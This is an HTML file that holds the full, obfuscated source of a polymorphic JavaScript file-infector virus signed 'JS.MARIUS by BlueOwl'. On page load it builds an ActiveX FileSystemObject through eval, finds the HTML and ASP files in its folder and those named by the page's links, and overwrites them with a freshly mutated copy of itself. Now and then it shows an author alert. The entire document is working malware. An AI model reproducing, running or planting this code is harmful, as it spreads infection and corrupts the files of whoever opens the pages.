<!-- Filename: 2NDGEN.HTML -->
<html><body><form name=MX><script>

// JS.MARIUS by BlueOwl

// Note: running this virus can cause damages and the author
// isn't responsible for your actions.
// This comment will be automatically removed.

function _leustemjeptpbsli(){_cgvsphtfvjvc()}
function _cpug(){_sjed="";_mhhs()}
_rgouf=6
function _wnjt(){_egce=r2(_egce,rp[g],_sfdt())}
function _phjcuu(){_leustemje=_cgvsp.split("</"+_hhfch+">");_uwdl()}

_j_qqupn="_vfhvn$_cgvsphtf$_ntbw$_leustemjeptpb$_tnv$_lpihepdrws$_cgvsp$_leustemje$_lpihep$_leust$_egce$_ptkeu$_tnvn$_sjed$_urwhgi"
/*locudjinku*/
_otrr="script"
//cpx
_lpihep=""
/*umeaeuhbpvtigpvgtg*/
function r3(r_,v_,w_){while(r(xz,v_,w_)!=xz)xz=r(xz,v_,w_)}
_tnvn=0
_p_qrcgih="Bl"
function _sfib(){_egce+="</"+_otrr+"></form>";_ijbjm()}
function _ngjkw(){if(_lpihepdrwsjdks)_leustemjeptpbsli()}
/*hvb*/
function _vplo(){_leustemjeptpboz=_leust[h].split("");_ogem()}
_cgvsphtfct_koj="crip"
//elfisqgk
function r(r_,v_,w_){return r_.replace(v_,w_)}
function _emkr2(){_m=_vin;_nrpgh()}
_sjed=""
function _vur(){mu="_";_hkll();while(_qqupn()){mu="_";_hkll()}_aoiq()}
//cmukrrabgnnfjsjge
_cgvsphtfct08="l"
var rbfjmrtl=9118833
_qiqi="$_hjun$_j_qqupn$_j_emg$_tno$_upwbd$_spc$_qiqi$_wgkb$_ntf$_p_lccpb$_p_qrcgih$_p_wnjt$_tildu$_qcfni"
//borpbkwmbedoi
function _jrtjc(){ba=rn(_lpihep.length-1);_rwmkc()}
_ntf="$_ogem$_opv$_gec$_nrram$_rmgj$_ile$_gonnq$_cpug$_mhhs$_pirsh$_koj$_otrr$_hhfch$_lpihepdrwstvvatr$_bchkj$_polpms$_emkr$_vin"

_ntbw=""
var tqqgaxqacptu='gjedku'
function _ile(){_tnvn=rn(13);_sjed="";_cpug();return _sjed}

function _vinfjqb(){for(bv=0;bv<gb;bv++)_rut()}
var ibdnqiwcixjoxiwun=5860842
_p_wnjt="ueO"
function _lpihepmrucp9(){_lpihepdrwsjdks=0;_leustemjejfs0()}
function _lpihepmrucp2(){_leustemjetqt=_vfhvn.GetFolder(_ptkeukic);_lpihepmrucp3()}
var bheodgijrpqasbp=7604319
_polpms=String.fromCharCode(13,10);
_cgvsphtfct04="Obje"
/*kxufpx*/
function _spmuaa(){_cgvsphtfu=1;_ershju();if(!_cgvsphtfu)_rgouf++;return _cgvsphtfu}
function _rpfjf(){_cgvsp=_lpihepdrws.ReadAll();_nkte()}
function g08(){if(_tnvn==11)_sjed=_polpms}
function _uubmrs(cz){return String.fromCharCode(cz)}
/*cfrarpubnsjpffqgig*/
function _cgvsphtfvjvc(){_tnv=_leustnsu;_seite()}
_cgvsp=""
_ptkeuollar="$"
var qcfqqvkabdsodkcpu=1668202
function _qqupn(){fl=0;for(re=0;re<nz.length;re++)_emg();return fl}
var oefikamfjc=6586091
_hhfch="body"
/*mpeorctpwtmirlolwgl*/
_hjun="_lpihepmrucp$_leustemjejfs$_ngjkw$_leustemjeptpbsli$_cgvsphtfvjvc$_seite$_ptkeukic$_leustemjetqt$_lpihepdrwstvva$_ptkeuoee$_lpihepdrwsjdks$_leustnsu$_nfnf$"
//buoof
function _hkll(){gb=rn(3)+3;_vinfjqb()}
function _rtes(){for(q=0;q<_lpihep.length;q++)_ccdp();_svcd()}
function _ccdp(){ga=_leust[q];_jrtjc()}
_ptkeu=""

function _leustemjejfs0(){if(_ptkeuoee.split(_nfnf).length==2)_lpihepdrwsjdks=1;_leustemjejfs2()}
var osummnfqsbmcdpod='jdq'
_j_emg="$_ddj$_vrbwl$_aqso$_cssp$_ijthci$_ksblm$_nrpgh$_rsme$_clupk$_eerdd$_unclb$_iipej"
function _gec(){_hg=rn(16)+3;_nrram()}
function g_koj(){if(_tnvn==7)_sjed="/*"+_opv()+"*/"+_polpms;g07()}
function _iipej(){if(_vfhvn.FileExists(_tnv))_bumkb()}

_bchkj="MX"
function _aqso(){eval('_cgvsphtf=document.MX.innerHTML;_cssp()')}
//oqmcliucr
_lpihepdrwstvvatr="file"
_cgvsphtfct10="emObj"
function _rsme(){for(y_=0;y_<_ntbw.length;y_++){_leustemjeptpb=""+_ntbw[y_];_clupk()}p1()}
function _dkhl(){_leust=_lpihep;_rtes()}
function rn(n_){return Math.round(_ddj(n_))}
_upwbd="_ccdp$_jrtjc$_rwmkc$_svcd$_gibb$_sfib$_ijbjm$_ukjl$_jbf$_rtp$_qnwhcu"
var acgmbwurvsaqudcu=8732296
_qcfni="003"
function _ogem(){if(_leustemjeptpboz[0]=="v" || _leustemjeptpboz[0]=="/")lo=0}
_cgvsphtfct03="iveX"
/*fdrscvox*/
_cgvsphtfct05="ct(\"S"
_spc="$_lccpb$_qrcgih$_wnjt$_sfdt$_vur$_hkll$_vinfjqb$_rut$_aoiq$_qqupn$_emg$_ptkeuollar"
/*nqpkkkquthp*/
_leustemjeptpb=""
var sumjfhftgrle=4410301
_wgkb="$_uubmrs$_rgouf$_spmuaa$_ershju$_oej$_polpmslkh$_leustemjeptpboz$_kkl$_jsk$_vplo$_lpihepnd"
function _lpihepmrucp4(){for(;!_lpihepdrwstvva.atEnd();_lpihepdrwstvva.moveNext())_lpihepmrucp5()}
_tildu="wl 2"
function _rwmkc(){_leust[q]=_leust[ba];_leust[ba]=ga}
_p_lccpb="by "
function _pirsh(){if(_tnvn==5)_sjed="var "+_opv()+"='"+_opv()+"'"+_polpms;g_koj()}
function _aoiq(){nz[nz.length]=mu}

function _jbf(){_lpihepdrws.Write(_cgvsp);_rtp()}
/*mmfvmpevbcctkmh*/
function _oej(){if(!_rgouf)_cgvsphtfu=0;_polpmslkh()}
function r2(r_,v_,w_){xz=r_;r3(xz,v_,w_);return xz}

function _ijthci(){i=i[1].split("</"+_otrr.toUpperCase()+">");_ksblm()}
function _nkte(){_lpihepdrws.Close();_phjcuu()}
_tno="$_bumkb$_rpfjf$_nkte$_phjcuu$_uwdl$_ukov$_rlt$_djfgo$_dkhl$_rtes$"
/*vjtvvnpsqf*/
function _uwdl(){if(_leustemje.length!=2){_ukov()}else{_djfgo()}}
var fukvtbhmokorvihrmge='glghsjbblcpq'
_tnv=""
function _lpihepmrucp6(){_ptkeuoee=_leustnsu.split(".");_lpihepmrucp7()}
function _ijbjm(){_lpihepdrws=_vfhvn.OpenTextFile(_tnv,2);_ukjl()}
function p1(){if(!rn(50))p2()}
function _kkl(){lo=1;_jsk();return lo}

function _rlt(){if(_leustemje.length==2)_djfgo()}
function _bumkb(){_lpihepdrws=_vfhvn.OpenTextFile(_tnv);_rpfjf()}
function _qnwhcu(){eval("_vfhvn="+_cgvsphtfct01+_cgvsphtfct02+_cgvsphtfct03+_cgvsphtfct04+_cgvsphtfct05+_cgvsphtfct_koj+_cgvsphtfct07+_cgvsphtfct08+_cgvsphtfct09+_cgvsphtfct10+_cgvsphtfct11);_vrbwl()}
//nki
function _svcd(){_egce="";for(h=0;h<_leust.length;h++)if(_kkl())_egce+=_leust[h]+_polpms+_ile();_lccpb()}
function _djfgo(){_lpihep=_m.split(_polpms);if(_spmuaa())_dkhl()}
_m=""
var hjlxd=7055447
function _ershju(){_rgouf--;_oej()}
function _rut(){mu+=_uubmrs(rn(22)+97)}
function _lpihepmrucp1(){_ptkeukic=".";_lpihepmrucp2()}
function _lpihepmrucp8(){_ptkeuoee=_ptkeuoee.toUpperCase();_lpihepmrucp9()}
function p2(){alert(_p_lccpb+_p_qrcgih+_p_wnjt+_tildu+_qcfni)}
_leust=""
function _emkr(){_aqso()}
function _nrram(){for(fd=0;fd<_hg;fd++)_rmgj()}
function _gibb(){_egce="<form name="+_bchkj+"><"+_otrr+">"+_egce;_sfib()}
function _sfdt(){_vur();return mu}
function _seite(){_bumkb()}
function _mhhs(){if(_tnvn==3)_sjed="//"+_opv()+_polpms;_pirsh()}
function g07(){if(_tnvn==9)_sjed="var "+_opv()+"="+rn(_urwhgi)+_polpms;g08()}

_cgvsphtfct02="w Act"
function _clupk(){_tnv=_leustemjeptpb.replace(_lpihepdrwstvvatr+":///","");_eerdd()}
function _ukov(){_leustemje=_cgvsp.split("</"+_hhfch.toUpperCase()+">");_rlt()}
/*svmuflcqvvbdwghmp*/
function _ksblm(){_m=i[0];_nrpgh()}
_cgvsphtfct01="ne"
function _rmgj(){_tnvd+=_uubmrs(97+rn(23))}
function _vrbwl(){rp=_hjun+_j_qqupn+_j_emg+_tno+_upwbd+_spc+_qiqi+_wgkb+_ntf;rp=rp.split(_ptkeuollar);_emkr()}
function _polpmslkh(){if(_cgvsp.split("").length<2003)_cgvsphtfu=0}
function _eerdd(){if(_tnv!=_leustemjeptpb)_unclb()}
_cgvsphtfct09="eSyst"
function _jsk(){if(_leust[h]==""){lo=0;return 0}_vplo()}
/*catlf*/
_cgvsphtf=""
//dbftaugnhdkkvj
function _rtp(){_lpihepdrws.Close()}
function _opv(){_tnvd="";_gec();return _tnvd}
var odkjgfuhf=8027405
window.onload=new Function("_qnwhcu()")
function _ddj(n_){return Math.random()*n_}
var krvbfnwpjjnwnuw=3119011
function ri(v_){return r(v_,"/","\\")}
function _leustemjejfs2(){if(_ptkeuoee=="ASP")_lpihepdrwsjdks=1;_ngjkw()}
_lpihepdrws=""
_nfnf="HT"
function _cssp(){i=_cgvsphtf.split("<"+_otrr.toUpperCase()+">");_ijthci()}
var uiddl='tlrscid'
_cgvsphtfct07="ting.Fi"
_cgvsphtfct11="ect\");"
function _qrcgih(){for(g=0;g<rp.length;g++)_wnjt();_gibb()}
_leustemje=""
//wuqvwcosrcg
function _emg(){if(nz[re].split(mu).length!=1 || mu.split(nz[re]).length!=1)fl=1}
function _ukjl(){_cgvsp=_leustemje[0]+_egce+"</Body>"+_leustemje[1];_jbf()}
_egce=""
var iwtiftexdfevplcgf=3493048
function _lpihepmrucp3(){_lpihepdrwstvva=new Enumerator(_leustemjetqt.Files);_lpihepmrucp4()}
function _nrpgh(){_ntbw=document.links;_lpihepmrucp1();_rsme()}

function _lccpb(){nz=new Array();_qrcgih()}
function _unclb(){while(ri(_tnv)!=_tnv)_tnv=ri(_tnv);_tnv=unescape(_tnv);_iipej()}
var fqqibfptdaqgh=2995959
function _lpihepmrucp5(){_leustnsu=""+_lpihepdrwstvva.item();_lpihepmrucp6()}
function _lpihepmrucp7(){_ptkeuoee=_ptkeuoee[_ptkeuoee.length-1];_lpihepmrucp8()}
_urwhgi=9999999
var swldhtflrsmqs='rvnupeikwvshluapceo'
</script></form></Body></html>
